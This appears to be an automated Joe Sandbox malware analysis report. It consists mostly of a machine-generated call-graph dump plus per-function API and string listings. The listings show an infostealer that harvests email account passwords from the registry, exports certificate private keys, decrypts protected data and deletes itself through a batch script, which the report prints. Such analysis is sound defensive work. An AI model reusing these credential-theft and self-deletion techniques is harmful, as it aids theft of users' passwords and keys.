8217->8219 8220 4048f3 8218->8220 8221 40473b 28 API calls 8219->8221 8222 40490b 8220->8222 8224 401c21 6 API calls 8220->8224 8221->8216 8223 401c86 7 API calls 8222->8223 8225 404912 8223->8225 8226 404902 8224->8226 8227 40492a 8225->8227 8229 401c21 6 API calls 8225->8229 8228 40473b 28 API calls 8226->8228 8230 401b46 6 API calls 8227->8230 8228->8222 8273 40c57e 8272->8273 8274 401b46 6 API calls 8273->8274 8275 40c594 8274->8275 8276 402200 9 API calls 8275->8276 8277 40c5bb 8275->8277 8278 40c59e 8276->8278 8277->7566 8278->8277 8279 403f6e 41 API calls 8278->8279 8280 40c5b6 8279->8280 8281 401752 LocalFree 8280->8281 8281->8277 8283 40717d 8282->8283 10087 406f89 RegOpenKeyA 8283->10087 8286 406f89 14 API calls 8287 4071a5 8286->8287 8287->7566 8289 40156d 8288->8289 8290 409aff GetCurrentDirectoryA 8289->8290 8291 40981e 83 API calls 8290->8291 8292 409b3a 8291->8292 8293 40981e 83 API calls 8292->8293 8294 409b56 SetCurrentDirectoryA 8293->8294 8295 409b6d 8294->8295 8295->7566 8297 40e4fb 8296->8297 8298 401b46 6 API calls 8297->8298 8299 40e515 8298->8299 8300 40e532 8299->8300 8302 403f6e 41 API calls 8299->8302 8301 401b46 6 API calls 8300->8301 8303 40e548 8301->8303 8304 40e52d 8302->8304 8305 40e565 8303->8305 8307 403f6e 41 API calls 8303->8307 8306 401752 LocalFree 8304->8306 8308 401b46 6 API calls 8305->8308 8306->8300 8309 40e560 8307->8309 8310 40e57c 8308->8310 8311 401752 LocalFree 8309->8311 8312 40e599 8310->8312 8313 403f6e 41 API calls 8310->8313 8311->8305 8314 401b46 6 API calls 8312->8314 8316 40e594 8313->8316 8315 40e5af 8314->8315 8318 403f6e 41 API calls 8315->8318 8319 40e5cc 8315->8319 8317 401752 LocalFree 8316->8317 8317->8312 8320 40e5c7 8318->8320 8319->7566 8321 401752 LocalFree 8320->8321 8321->8319 8323 405ffb 8322->8323 10098 405e01 RegOpenKeyA 8323->10098 8325 40600b 8325->7566 8327 405d7a 8326->8327 8328 401b46 6 API calls 8327->8328 8331 405d96 8328->8331 8329 405db1 8330 401b46 6 API calls 8329->8330 8335 405dca 
8330->8335 8331->8329 8332 401752 LocalFree 8331->8332 8332->8329 8333 405de5 10109 405b69 RegOpenKeyA 8333->10109 8335->8333 8336 401752 LocalFree 8335->8336 8336->8333 8337 405df2 8337->7566 8339 4056fa 8338->8339 10119 4055c1 8339->10119 8373 406c7a 8372->8373 10199 406931 RegOpenKeyA 8373->10199 8376 401b46 6 API calls 8377 406ca1 8376->8377 8378 406cbf 8377->8378 8379 401c21 6 API calls 8377->8379 8380 401c86 7 API calls 8378->8380 8382 406cb0 8379->8382 8381 406cc6 8380->8381 8383 406cef 8381->8383 8385 401c21 6 API calls 8381->8385 8384 406b9d 20 API calls 8382->8384 8386 401c86 7 API calls 8383->8386 8387 406cba 8384->8387 8388 406cd5 8385->8388 8389 406cf6 8386->8389 8390 401752 LocalFree 8387->8390 8391 401c21 6 API calls 8388->8391 8392 406d1f 8389->8392 8395 401c21 6 API calls 8389->8395 8390->8378 8393 406ce0 8391->8393 8394 401c86 7 API calls 8392->8394 10210 406b9d 8393->10210 8397 406d26 8394->8397 8398 406d05 8395->8398 8400 406d4f 8397->8400 8404 401c21 6 API calls 8397->8404 8401 401c21 6 API calls 8398->8401 8399 406cea 8403 401752 LocalFree 8399->8403 8400->7566 8402 406d10 8401->8402 8405 406b9d 20 API calls 8402->8405 8403->8383 8406 406d35 8404->8406 8407 406d1a 8405->8407 8408 401c21 6 API calls 8406->8408 8409 401752 LocalFree 8407->8409 8410 406d40 8408->8410 8409->8392 8411 406b9d 20 API calls 8410->8411 8412 406d4a 8411->8412 8415 40156d 8414->8415 8416 404c7d GetWindowsDirectoryA 8415->8416 8417 404c99 8416->8417 8418 404d3c 8416->8418 8417->8418 8421 401bcd 5 API calls 8417->8421 8419 401c86 7 API calls 8418->8419 8420 404d43 8419->8420 8422 404d63 8420->8422 8424 401c21 6 API calls 8420->8424 8423 404cb5 GetPrivateProfileStringA 8421->8423 10264 404c1c 8422->10264 8425 404ce5 8423->8425 8426 404cf6 GetPrivateProfileStringA 8423->8426 8428 404d52 8424->8428 8429 404a90 31 API calls 8425->8429 8431 404d20 8426->8431 8432 404d31 8426->8432 10236 404a90 8428->10236 8429->8426 8435 404a90 31 API calls 8431->8435 8436 401752 LocalFree 
8432->8436 8434 404c1c 36 API calls 8438 404d81 8434->8438 8435->8432 8436->8418 8440 404c1c 36 API calls 8438->8440 8439 401752 LocalFree 8439->8422 8441 404d90 8440->8441 8441->7566 8443 4058f9 8442->8443 8444 401b46 6 API calls 8443->8444 8445 405913 8444->8445 8446 40592b 8445->8446 8448 403c89 16 API calls 8445->8448 8447 401b46 6 API calls 8446->8447 8449 405942 8447->8449 8450 405926 8448->8450 8452 40595a 8449->8452 8453 403c89 16 API calls 8449->8453 8451 401752 LocalFree 8450->8451 8451->8446 8454 401b46 6 API calls 8452->8454 8455 405955 8453->8455 8456 405971 8454->8456 8457 401752 LocalFree 8455->8457 8458 405984 8456->8458 10287 405889 8456->10287 8457->8452 8459 401b46 6 API calls 8458->8459 8461 40599b 8459->8461 8463 4059ae 8461->8463 8465 405889 41 API calls 8461->8465 8466 401b46 6 API calls 8463->8466 8464 401752 LocalFree 8464->8458 8467 4059a9 8465->8467 8468 4059c5 8466->8468 8469 401752 LocalFree 8467->8469 8470 4059d8 8468->8470 8471 405889 41 API calls 8468->8471 8469->8463 10278 4058ba 8470->10278 8473 4059d3 8471->8473 8476 401752 LocalFree 8473->8476 8476->8470 8481 407279 8480->8481 10292 4071b4 RegOpenKeyA 8481->10292 8484 4071b4 9 API calls 8485 4072a1 8484->8485 8486 4071b4 9 API calls 8485->8486 8487 4072b4 8486->8487 8488 4071b4 9 API calls 8487->8488 8489 4072c6 8488->8489 8489->7566 8491 405a78 8490->8491 10300 405a05 8491->10300 8494 405a05 46 API calls 8495 405a8f 8494->8495 8496 405a05 46 API calls 8495->8496 8497 405a99 8496->8497 8497->7566 8499 40156d 8498->8499 8500 409a78 GetCurrentDirectoryA 8499->8500 8501 40981e 83 API calls 8500->8501 8502 409ab3 8501->8502 8503 40981e 83 API calls 8502->8503 8504 409acf SetCurrentDirectoryA 8503->8504 8505 409ae6 8504->8505 8505->7566 8517 407675 8506->8517 8507 407748 10313 407615 8507->10313 8508 40768d StrStrA 8510 4076ea StrStrIA 8508->8510 8508->8517 8510->8517 8512 4076a6 lstrlen 8515 402200 9 API calls 8512->8515 8513 407615 46 API calls 8516 40775c 8513->8516 8514 402200 9 
API calls 8514->8517 8515->8517 8519 407615 46 API calls 8516->8519 8517->8507 8517->8508 8517->8512 8517->8514 8518 403f6e 41 API calls 8517->8518 8523 401752 LocalFree 8517->8523 8518->8517 8520 407766 8519->8520 10324 4074aa RegOpenKeyA 8520->10324 8523->8517 8524 4074aa 48 API calls 8525 40778b 8524->8525 8525->7566 8527 40e1f3 8526->8527 8528 403fb9 46 API calls 8527->8528 8529 40e20d 8528->8529 8529->7566 8531 40bdf3 8530->8531 8532 40bd1f 46 API calls 8531->8532 8533 40be03 8532->8533 8533->7566 8537 404ff3 8534->8537 8535 405001 StrStrIA 8535->8537 8536 40503c 10335 404f37 8536->10335 8537->8535 8537->8536 8539 402200 9 API calls 8537->8539 8547 401752 LocalFree 8537->8547 10369 404e00 8537->10369 8539->8537 8541 404f37 34 API calls 8542 405050 8541->8542 8544 404f37 34 API calls 8542->8544 8545 40505a 8544->8545 8546 404f37 34 API calls 8545->8546 8548 405064 8546->8548 8547->8537 10364 404db6 8548->10364 8551 404db6 6 API calls 8552 40507e 8551->8552 8553 404db6 6 API calls 8552->8553 8562 40c768 8561->8562 8563 401b46 6 API calls 8562->8563 8564 40c77e 8563->8564 8565 40c7c1 8564->8565 8566 40c782 StrStrIA 8564->8566 8565->7566 8567 40c796 8566->8567 8568 40c7b9 8566->8568 8569 402200 9 API calls 8567->8569 8570 401752 LocalFree 8568->8570 8571 40c79e 8569->8571 8570->8565 8572 403dc3 41 API calls 8571->8572 8573 40c7b4 8572->8573 8574 401752 LocalFree 8573->8574 8574->8568 8576 40c2e4 8575->8576 10396 40c261 8576->10396 8579 40c261 46 API calls 8580 40c2fb 8579->8580 8581 40c261 46 API calls 8580->8581 8582 40c305 8581->8582 8582->7566 8584 40c7e2 8583->8584 8585 403fb9 46 API calls 8584->8585 8586 40c7fc 8585->8586 8586->7566 8588 40bee0 8587->8588 8589 40bd1f 46 API calls 8588->8589 8590 40bef0 8589->8590 8590->7566 8592 40c35d 8591->8592 10413 40c314 8592->10413 8595 40c314 46 API calls 8596 40c374 8595->8596 8597 40c314 46 API calls 8596->8597 8598 40c37e 8597->8598 8598->7566 8600 40156d 8599->8600 8601 407a60 GetWindowsDirectoryA 8600->8601 8602 
407aa4 8601->8602 8603 407a78 8601->8603 8602->7566 8603->8602 8604 401bcd 5 API calls 8603->8604 8605 407a90 8604->8605 8606 403c89 16 API calls 8605->8606 8607 407a9f 8606->8607 8608 401752 LocalFree 8607->8608 8608->8602 8610 40db56 8609->8610 8611 401b46 6 API calls 8610->8611 8612 40db70 8611->8612 8613 40db8d 8612->8613 8614 403f6e 41 API calls 8612->8614 8615 403fb9 46 API calls 8613->8615 8617 40db88 8614->8617 8616 40dba4 8615->8616 8616->7566 8618 401752 LocalFree 8617->8618 8618->8613 8620 40d7d2 8619->8620 10422 40d5dc RegOpenKeyA 8620->10422 8623 40d5dc 14 API calls 8624 40d7fa 8623->8624 8624->7566 8626 406f52 8625->8626 10433 406d5e RegOpenKeyA 8626->10433 8629 406d5e 14 API calls 8630 406f7a 8629->8630 8630->7566 8638 403f88 8631->8638 8634 403f88 46 API calls 8635 403fe2 8634->8635 8636 403f88 46 API calls 8635->8636 8637 403ff5 8636->8637 8637->7654 8647 401c86 8638->8647 8641 403fb5 8641->8634 8646 401752 LocalFree 8646->8641 8667 401769 LocalAlloc 8647->8667 8649 401c97 8650 401ca5 SHGetFolderPathA 8649->8650 8651 401ca3 8649->8651 8650->8651 8652 401cf6 8650->8652 8653 401752 LocalFree 8651->8653 8652->8641 8656 401c21 8652->8656 8654 401cc3 8653->8654 8654->8652 8668 401b46 8654->8668 8657 401c2b lstrlen lstrlen 8656->8657 8687 401769 LocalAlloc 8657->8687 8660 401c5a lstrcpy lstrcat 8661 401c77 8660->8661 8662 401c7f 8660->8662 8663 401752 LocalFree 8661->8663 8664 403f6e 8662->8664 8663->8662 8688 403dc3 8664->8688 8667->8649 8669 401b52 8668->8669 8672 401a62 8669->8672 8673 401a70 RegOpenKeyExA 8672->8673 8675 401ab0 RegQueryValueExA 8673->8675 8676 401b1f 8673->8676 8678 401b17 RegCloseKey 8675->8678 8679 401acb 8675->8679 8677 401b41 8676->8677 8680 401a62 2 API calls 8676->8680 8677->8654 8678->8676 8679->8678 8686 401769 LocalAlloc 8679->8686 8680->8677 8682 401ae7 RegQueryValueExA 8683 401b01 8682->8683 8684 401b07 8682->8684 8685 401752 LocalFree 8683->8685 8684->8678 8685->8684 8686->8682 8687->8660 8689 403de2 8688->8689 8691 
403ddd 8688->8691 8690 401752 LocalFree 8689->8690 8692 403f6a 8690->8692 8691->8689 8693 403e02 8691->8693 8694 403df3 8691->8694 8692->8646 8695 401bcd 5 API calls 8693->8695 8712 401bcd 8694->8712 8697 403e00 8695->8697 8713 401bd7 lstrlen lstrlen 8712->8713 8735 401769 LocalAlloc 8713->8735 8870 40cea9 8869->8870 8877 40cc74 8869->8877 8870->7659 8871 40cc7b RegEnumKeyExA 8872 40cca4 RegCloseKey 8871->8872 8871->8877 8872->8870 8874 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 8874->8877 8875 401b46 6 API calls 8875->8877 8877->8871 8877->8874 8877->8875 8878 401752 LocalFree 8877->8878 8879 40cc54 13 API calls 8877->8879 8880 401548 lstrlen 8877->8880 8891 403ff9 8877->8891 8878->8877 8879->8877 8880->8877 8882 401b46 6 API calls 8881->8882 8883 40cec9 8882->8883 8884 40cf38 8883->8884 8885 40cf33 8883->8885 8887 40ceeb wsprintfA 8883->8887 8889 403c89 16 API calls 8883->8889 8890 401752 LocalFree 8883->8890 8884->7663 8886 401752 LocalFree 8885->8886 8886->8884 8888 401b46 6 API calls 8887->8888 8888->8883 8889->8883 8890->8883 8892 404022 8891->8892 8893 40407e 8891->8893 8892->8893 8894 40403f CryptUnprotectData 8892->8894 8893->8877 8894->8893 8896 40404f 8894->8896 8895 404076 LocalFree 8895->8893 8896->8893 8896->8895 8898 401bcd 5 API calls 8897->8898 8899 40220f lstrlen 8898->8899 8900 40222d StrStrIA 8899->8900 8901 40221e 8899->8901 8902 402240 StrRChrIA 8900->8902 8903 40223c 8900->8903 8901->8900 8904 40224e lstrlen 8902->8904 8903->8902 8906 402261 8904->8906 8906->7674 8908 401c86 7 API calls 8907->8908 8909 4072e0 8908->8909 8910 407332 8909->8910 8911 401c21 6 API calls 8909->8911 8910->7698 8912 4072ef 8911->8912 8913 403f6e 41 API calls 8912->8913 8914 407305 8913->8914 8915 403f6e 41 API calls 8914->8915 8916 407319 8915->8916 8917 403f6e 41 API calls 8916->8917 8918 40732d 8917->8918 8919 401752 LocalFree 8918->8919 8919->8910 8921 401c86 7 API calls 8920->8921 8922 407386 8921->8922 8923 407431 8922->8923 8924 4073a2 8922->8924 8925 
401c21 6 API calls 8922->8925 8923->7706 8926 401bcd 5 API calls 8924->8926 8925->8924 8927 4073b2 8926->8927 8928 403c89 16 API calls 8927->8928 8929 4073c1 8928->8929 8930 401752 LocalFree 8929->8930 8931 4073c6 8930->8931 8932 401bcd 5 API calls 8931->8932 8933 4073d3 8932->8933 8934 403c89 16 API calls 8933->8934 8935 4073e2 8934->8935 8936 401752 LocalFree 8935->8936 8937 4073e7 8936->8937 8938 401bcd 5 API calls 8937->8938 8939 4073f4 8938->8939 8952 401b46 6 API calls 8951->8952 8953 40e45a 8952->8953 8954 40e479 8953->8954 8958 40e3f3 8953->8958 8954->7723 8957 401752 LocalFree 8957->8954 8965 40e3bd 8958->8965 8961 40e3bd 46 API calls 8962 40e424 8961->8962 8963 40e3bd 46 API calls 8962->8963 8964 40e43b 8963->8964 8964->8957 8966 401c86 7 API calls 8965->8966 8967 40e3c8 8966->8967 8968 40e3ef 8967->8968 8969 401c21 6 API calls 8967->8969 8968->8961 8970 40e3d5 8969->8970 8971 403dc3 41 API calls 8970->8971 8972 40e3ea 8971->8972 8973 401752 LocalFree 8972->8973 8973->8968 8975 40652e 8974->8975 8982 4062cf 8974->8982 8975->7732 8976 4062d6 RegEnumKeyExA 8977 4062ff RegCloseKey 8976->8977 8976->8982 8977->8975 8979 401bcd 5 API calls 8979->8982 8980 401c21 6 API calls 8980->8982 8981 401b46 6 API calls 8981->8982 8982->8976 8982->8979 8982->8980 8982->8981 8983 403ff9 2 API calls 8982->8983 8984 401752 LocalFree 8982->8984 8985 401548 lstrlen 8982->8985 8983->8982 8984->8982 8985->8982 8987 4046ae 8986->8987 8994 40455b 8986->8994 8987->7738 8988 404562 RegEnumKeyExA 8989 40458b RegCloseKey 8988->8989 8988->8994 8989->8987 8991 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 8991->8994 8992 401752 LocalFree 8992->8994 8993 401b46 6 API calls 8993->8994 8994->8988 8994->8991 8994->8992 8994->8993 8995 401548 lstrlen 8994->8995 8996 404538 11 API calls 8994->8996 8995->8994 8996->8994 8998 404534 8997->8998 8999 40444d 8997->8999 8998->7744 9000 404454 RegEnumValueA 8999->9000 9003 40449e StrStrIA 8999->9003 9004 401b46 6 API calls 8999->9004 9005 401752 
LocalFree 8999->9005 9000->8999 9001 404482 RegCloseKey 9000->9001 9001->8998 9003->8999 9004->8999 9005->8999 9007 4089eb 9006->9007 9014 408920 9006->9014 9007->7754 9008 408927 RegEnumKeyExA 9009 408950 RegCloseKey 9008->9009 9008->9014 9009->9007 9010 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 9010->9014 9012 401b46 6 API calls 9012->9014 9014->9008 9014->9010 9014->9012 9015 408900 11 API calls 9014->9015 9016 401752 LocalFree 9014->9016 9032 403c60 9014->9032 9015->9014 9016->9014 9018 408b2d 9017->9018 9019 408a0f 9017->9019 9018->7758 9020 408a16 RegEnumKeyExA 9019->9020 9023 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 9019->9023 9024 401752 LocalFree 9019->9024 9025 401b46 6 API calls 9019->9025 9026 402200 9 API calls 9019->9026 9028 4089ef 50 API calls 9019->9028 9031 408a93 9019->9031 9020->9019 9021 408a3f RegCloseKey 9020->9021 9021->9018 9023->9019 9024->9019 9025->9019 9026->9019 9028->9019 9029 401752 LocalFree 9029->9019 9030 403f6e 41 API calls 9030->9031 9031->9029 9031->9030 9039 401d53 9031->9039 9033 403c85 9032->9033 9034 403c69 9032->9034 9033->9014 9034->9033 9036 401548 9034->9036 9037 401551 lstrlen 9036->9037 9038 40155b 9036->9038 9037->9038 9038->9033 9040 401d62 9039->9040 9041 401d5d 9039->9041 9040->9031 9041->9040 9042 401d6b GetFileAttributesA 9041->9042 9043 401d78 9042->9043 9043->9031 9045 40e157 9044->9045 9046 40e15b 9044->9046 9045->7763 9055 401769 LocalAlloc 9046->9055 9048 40e165 lstrlen 9050 40e1a4 9048->9050 9051 40e18f 9048->9051 9052 401752 LocalFree 9050->9052 9053 403f6e 41 API calls 9051->9053 9054 40e1ac 9052->9054 9053->9050 9054->7763 9055->9048 9069 40bce9 9056->9069 9059 40bce9 46 API calls 9060 40bd50 9059->9060 9061 40bce9 46 API calls 9060->9061 9062 40bd67 9061->9062 9063 40bce9 46 API calls 9062->9063 9064 40bd7e 9063->9064 9065 40bce9 46 API calls 9064->9065 9066 40bd95 9065->9066 9067 40bce9 46 API calls 9066->9067 9068 40bdac 9067->9068 9068->7767 9070 401c86 7 API calls 9069->9070 9071 
40bcf4 9070->9071 9072 40bd1b 9071->9072 9073 401c21 6 API calls 9071->9073 9072->9059 9074 40bd01 9073->9074 9075 403dc3 41 API calls 9074->9075 9076 40bd16 9075->9076 9077 401752 LocalFree 9076->9077 9077->9072 9079 409833 9078->9079 9080 40988a 9078->9080 9081 401b46 6 API calls 9079->9081 9109 401769 LocalAlloc 9080->9109 9083 409845 9081->9083 9083->9080 9086 402200 9 API calls 9083->9086 9084 409894 RegOpenKeyA 9085 40991a 9084->9085 9099 4098aa 9084->9099 9087 401752 LocalFree 9085->9087 9089 409850 9086->9089 9090 409922 9087->9090 9088 4098b1 RegEnumKeyExA 9091 4098d6 RegCloseKey 9088->9091 9088->9099 9093 409885 9089->9093 9096 401c86 7 API calls 9089->9096 9090->7786 9091->9085 9092 401bcd 5 API calls 9092->9099 9095 401752 LocalFree 9093->9095 9095->9080 9098 40985e 9096->9098 9097 401c21 6 API calls 9097->9099 9100 40987d 9098->9100 9101 401c21 6 API calls 9098->9101 9099->9088 9099->9092 9099->9097 9102 40981e 79 API calls 9099->9102 9106 401752 LocalFree 9099->9106 9103 401752 LocalFree 9100->9103 9104 40986b 9101->9104 9102->9099 9103->9093 9110 4096a3 9104->9110 9106->9099 9107 409878 9108 401752 LocalFree 9107->9108 9108->9100 9109->9084 9111 401d53 GetFileAttributesA 9110->9111 9112 4096b2 9111->9112 9113 4096b6 9112->9113 9114 401d53 GetFileAttributesA 9112->9114 9113->9107 9116 4096c3 9114->9116 9115 4096c7 9115->9107 9116->9115 9117 4096e7 9116->9117 9118 4096d8 9116->9118 9288 40de36 9287->9288 9289 40df5e 9287->9289 9290 401b46 6 API calls 9288->9290 9289->7795 9291 40de48 9290->9291 9292 401b46 6 API calls 9291->9292 9293 40de5d 9292->9293 9294 401b46 6 API calls 9293->9294 9295 40de74 9294->9295 9296 401b46 6 API calls 9295->9296 9297 40de89 9296->9297 9298 401b46 6 API calls 9297->9298 9304 40de9e 9298->9304 9299 40df2e 9300 401752 LocalFree 9299->9300 9301 40df36 9300->9301 9302 401752 LocalFree 9301->9302 9303 40df3e 9302->9303 9305 401752 LocalFree 9303->9305 9304->9299 9306 403ff9 2 API calls 9304->9306 9307 40df46 9305->9307 9311 
40ded1 9306->9311 9311->9299 9313 401548 lstrlen 9311->9313 9314 40deff 9313->9314 9315 401548 lstrlen 9314->9315 9316 40df0a 9315->9316 9317 401548 lstrlen 9316->9317 9321 40df82 9320->9321 9322 40e027 9320->9322 9323 40df89 RegEnumValueA 9321->9323 9326 401b46 6 API calls 9321->9326 9327 40dfe4 StrStrIA 9321->9327 9329 401752 LocalFree 9321->9329 9330 40dce0 9321->9330 9322->7799 9323->9321 9324 40dfb7 RegCloseKey 9323->9324 9324->9322 9326->9321 9327->9321 9329->9321 9331 401d0b 2 API calls 9330->9331 9332 40dcef 9331->9332 9333 40dcf3 9332->9333 9334 401dd2 7 API calls 9332->9334 9333->9321 9335 40dd04 9334->9335 9345 40de12 9335->9345 9350 401769 LocalAlloc 9335->9350 9337 40dd2d StrStrA 9338 40dd41 lstrlen StrStrA 9337->9338 9340 40dd3c 9337->9340 9339 40dd66 lstrlen 9338->9339 9338->9340 9348 40dd14 9339->9348 9342 401752 LocalFree 9340->9342 9341 4027f2 3 API calls 9341->9348 9343 40de09 9342->9343 9344 401e66 3 API calls 9343->9344 9344->9345 9345->9321 9346 403ff9 2 API calls 9346->9348 9347 401752 LocalFree 9347->9348 9348->9337 9348->9340 9348->9341 9348->9346 9348->9347 9349 401548 lstrlen 9348->9349 9349->9348 9350->9348 9352 401578 9351->9352 9352->7803 9370 401769 LocalAlloc 9353->9370 9355 40e5ee RegOpenKeyA 9356 40e716 9355->9356 9367 40e60b 9355->9367 9358 401752 LocalFree 9356->9358 9357 40e612 RegEnumKeyExA 9359 40e63b RegCloseKey 9357->9359 9357->9367 9360 40e721 9358->9360 9359->9356 9360->7813 9362 401bcd LocalAlloc lstrlen lstrlen lstrcpy lstrcat 9362->9367 9363 401b46 6 API calls 9363->9367 9364 40e5db 45 API calls 9364->9367 9365 401bcd 5 API calls 9366 40e69c GetPrivateProfileStringA 9365->9366 9366->9367 9367->9357 9367->9362 9367->9363 9367->9364 9367->9365 9368 401752 LocalFree 9367->9368 9369 403f6e 41 API calls 9367->9369 9368->9367 9369->9367 9370->9355 9372 401c86 7 API calls 9371->9372 9373 40880e 9372->9373 9374 408821 9373->9374 9401 4086c7 9373->9401 9374->7821 9377 401752 LocalFree 9377->9374 9379 408562 9378->9379 9382 

                  Control-flow Graph

                  APIs
                  • GetTickCount.KERNEL32 ref: 0040FA0B
                  • wsprintfA.USER32 ref: 0040FA19
                  • GetModuleFileNameA.KERNEL32(?,00000104,00000105,00000105,00000105,?,00000105,0040F9F2), ref: 0040FA79
                  • GetTempPathA.KERNEL32(00000104,?,?,00000104,00000105,00000105,00000105,?,00000105,0040F9F2), ref: 0040FA8F
                  • lstrcat.KERNEL32(?,?), ref: 0040FAA3
                  • ExitProcess.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104,00000105,00000105,00000105,?,00000105), ref: 0040FABC
                  • lstrcpy.KERNEL32(?,?), ref: 0040FAD3
                  • StrRChrIA.SHLWAPI(?,00000000,0000005C,?,?,?,C0000000,00000003,00000000,00000002,00000000,00000000,00000104,?,?,00000104), ref: 0040FADF
                  • lstrcpy.KERNEL32(00000001,?), ref: 0040FAED
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$CountExitFileModuleNamePathProcessTempTicklstrcatwsprintf
                  • String ID: :ktk del %1 if exist %1 goto ktk del %0 $ "%s" $%d.bat$ShellExecuteA$open$shell32.dll
                  • API String ID: 629621046-4169620016
                  • Opcode ID: 2d4526de1fbfecd3fbb4542c10101f8a0fcd70485bed2be72a517248322137ac
                  • Instruction ID: f48094f2bf34160f77960da2a726bb2ff1328f347839c3ffb5de8ceac10d9150
                  • Opcode Fuzzy Hash: 2d4526de1fbfecd3fbb4542c10101f8a0fcd70485bed2be72a517248322137ac
                  • Instruction Fuzzy Hash: 64418230B44205BADF2976A19C13FAE7A67AF85704F20803EB215F62E1DEB94D545A1C

                  Control-flow Graph

                  APIs
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E798
                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040E7CC
                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040EA87
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseEnumOpen
                  • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                  • API String ID: 1332880857-2111798378
                  • Opcode ID: 1efb3267f2bb3610b73d164facee8bd75a0b0d5d416e8100a6d0dd2b11f23b77
                  • Instruction ID: 17efc9946458755bb64bf36a63b1628e6639bf8bc39f30ba5671466992181c26
                  • Opcode Fuzzy Hash: 1efb3267f2bb3610b73d164facee8bd75a0b0d5d416e8100a6d0dd2b11f23b77
                  • Instruction Fuzzy Hash: CF718331840118BBCF226F51CD42BDDBAB6BF04704F14C4BAB659750B1DB7A5BA1AF88

                  Control-flow Graph

                  APIs
                  • CertOpenSystemStoreA.CRYPT32(00000000,0041377D), ref: 0040D026
                  • CertEnumCertificatesInStore.CRYPT32(00000000), ref: 0040D03F
                  • lstrcmp.KERNEL32(?,2.5.29.37), ref: 0040D070
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  • lstrcmp.KERNEL32(?,0041378A), ref: 0040D0A8
                  • CryptAcquireCertificatePrivateKey.CRYPT32(00000000,00000000,00000000,?,?,00000000), ref: 0040D0C4
                  • CryptGetUserKey.ADVAPI32(?,?,?), ref: 0040D0DC
                  • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,00000000,?), ref: 0040D0F5
                  • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?,?), ref: 0040D11A
                  • CryptDestroyKey.ADVAPI32(?), ref: 0040D158
                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040D163
                  • CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D18B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$CertStore$Exportlstrcmp$AcquireAllocCertificateCertificatesCloseContextDestroyEnumLocalOpenPrivateReleaseSystemUser
                  • String ID: 2.5.29.37
                  • API String ID: 2649496969-3842544949
                  • Opcode ID: 90d45447d648ce5a9db7bc290ff7048b737502a1bb15dbf226a8ee68cf438de0
                  • Instruction ID: 7c639e010cdb965f3efc64817a9e83747879526ca5898d1d50ecab408f71e8b0
                  • Opcode Fuzzy Hash: 90d45447d648ce5a9db7bc290ff7048b737502a1bb15dbf226a8ee68cf438de0
                  • Instruction Fuzzy Hash: 52511731A00209FADF22ABA1DC09BEEBB75FB04345F108436F611791F4DB796994DB58

                  Control-flow Graph

                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00404B00
                  • lstrcmpiA.KERNEL32(00411EA6,?), ref: 00404B29
                  • lstrcmpiA.KERNEL32(00411EA8,?), ref: 00404B46
                  • FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?), ref: 00404BF5
                  • FindClose.KERNEL32(?,?,?,?,.ini,00000000,?), ref: 00404C08
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(?), ref: 00401BEE
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(00000000,?), ref: 00401BF8
                    • Part of subcall function 00401BCD: lstrcpy.KERNEL32(00000000,?), ref: 00401C0C
                    • Part of subcall function 00401BCD: lstrcat.KERNEL32(00000000,00000000), ref: 00401C15
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
